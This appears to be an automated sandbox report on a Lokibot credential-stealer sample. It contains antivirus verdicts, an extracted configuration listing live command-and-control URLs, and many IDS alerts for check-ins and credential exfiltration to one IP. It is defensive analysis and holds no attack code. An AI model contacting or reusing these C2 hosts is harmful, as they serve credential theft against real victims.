2024-09-25T15:30:12.218161+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55977	188.114.96.3	80	TCP
2024-09-25T15:30:13.173782+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55978	188.114.96.3	80	TCP
2024-09-25T15:30:13.993423+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55979	188.114.96.3	80	TCP
2024-09-25T15:30:14.842547+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55980	188.114.96.3	80	TCP
2024-09-25T15:30:15.691270+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55981	188.114.96.3	80	TCP
2024-09-25T15:30:16.551798+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55982	188.114.96.3	80	TCP
2024-09-25T15:30:17.497860+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55983	188.114.96.3	80	TCP
2024-09-25T15:30:18.363198+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55984	188.114.96.3	80	TCP
2024-09-25T15:30:19.199856+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55985	188.114.96.3	80	TCP
2024-09-25T15:30:20.095708+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55986	188.114.96.3	80	TCP
2024-09-25T15:30:21.507011+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55987	188.114.96.3	80	TCP
2024-09-25T15:30:23.134473+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55988	188.114.96.3	80	TCP
2024-09-25T15:30:24.350366+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55989	188.114.96.3	80	TCP
2024-09-25T15:30:25.290428+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55990	188.114.96.3	80	TCP
2024-09-25T15:30:26.169979+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55991	188.114.96.3	80	TCP
2024-09-25T15:30:27.001129+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55992	188.114.96.3	80	TCP
2024-09-25T15:30:27.899264+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55993	188.114.96.3	80	TCP
2024-09-25T15:30:28.753857+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55994	188.114.96.3	80	TCP
2024-09-25T15:30:29.618078+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55995	188.114.96.3	80	TCP
2024-09-25T15:30:30.428677+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55996	188.114.96.3	80	TCP
2024-09-25T15:30:31.273028+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55997	188.114.96.3	80	TCP
2024-09-25T15:30:32.135559+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55998	188.114.96.3	80	TCP
2024-09-25T15:30:33.256022+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	55999	188.114.96.3	80	TCP
2024-09-25T15:30:34.073488+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	56000	188.114.96.3	80	TCP
2024-09-25T15:30:35.801198+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	56001	188.114.96.3	80	TCP
2024-09-25T15:30:37.771542+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	56002	188.114.96.3	80	TCP
2024-09-25T15:30:38.713862+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	56003	188.114.96.3	80	TCP
2024-09-25T15:30:39.594556+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	56004	188.114.96.3	80	TCP
2024-09-25T15:30:40.433961+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	56005	188.114.96.3	80	TCP
2024-09-25T15:30:41.413983+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	56006	188.114.96.3	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 1e#U0414.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	Avira URL Cloud: Label: phishing
Source: http://alphastand.win/alien/fre.php	Avira URL Cloud: Label: phishing
Source: https://dddotx.shop/Mine/PWS/fre.php	Avira URL Cloud: Label: malware
Source: http://alphastand.top/alien/fre.php	Avira URL Cloud: Label: malware
Source: http://dddotx.shop/Mine/PWS/fre.php	Avira URL Cloud: Label: malware
Source: http://alphastand.trade/alien/fre.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}

Multi AV Scanner detection for submitted file

Source: 1e#U0414.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 1e#U0414.exe

Joe Sandbox ML: detected

Source: 1e#U0414.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1e#U0414.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: BATMAN.pdbxD source: 1e#U0414.exe, 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1751491077.00000000058B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: Sept24.pdbBSJB source: 1e#U0414.exe
Source:	Binary string: Sept24.pdb source: 1e#U0414.exe
Source:	Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3002754602.00000000009C2000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: BATMAN.pdb source: 1e#U0414.exe, 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1751491077.00000000058B0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

2_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55892 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55932 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55892 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55932 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55932 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55892 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55947 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55947 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55947 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55894 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55894 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55894 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55947 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55947 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49745 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55890 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55927 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55890 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55890 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55896 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55927 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55896 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55919 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55896 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55903 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55919 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55919 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55927 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55903 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49730 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49730 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55902 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55922 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55900 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55890 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55902 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49734 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55902 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55898 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55922 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55922 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55890 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49734 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55932 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55900 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55932 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49740
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55919 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55903 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55989 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49730 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55922 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55919 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55947
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49745 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55989 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55925 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55925 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55892 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55895 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55892 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55895 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55895 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55890
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55900 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55917 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55989 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:56006 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55897 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55902 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49730 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49735 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55895 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55898 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49736 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55894 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55917 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55896 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55917 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55896 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55967 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55902 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55892
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55925 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55895 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55927 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55927 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55924 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55925 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55925 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55967 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55943 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55899 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55900 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49733 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55893 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55968 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55893 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55917 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55989 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49732 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49732 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55986 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55897 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55903 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55894 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55924 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55924 -> 188.114.96.3:80
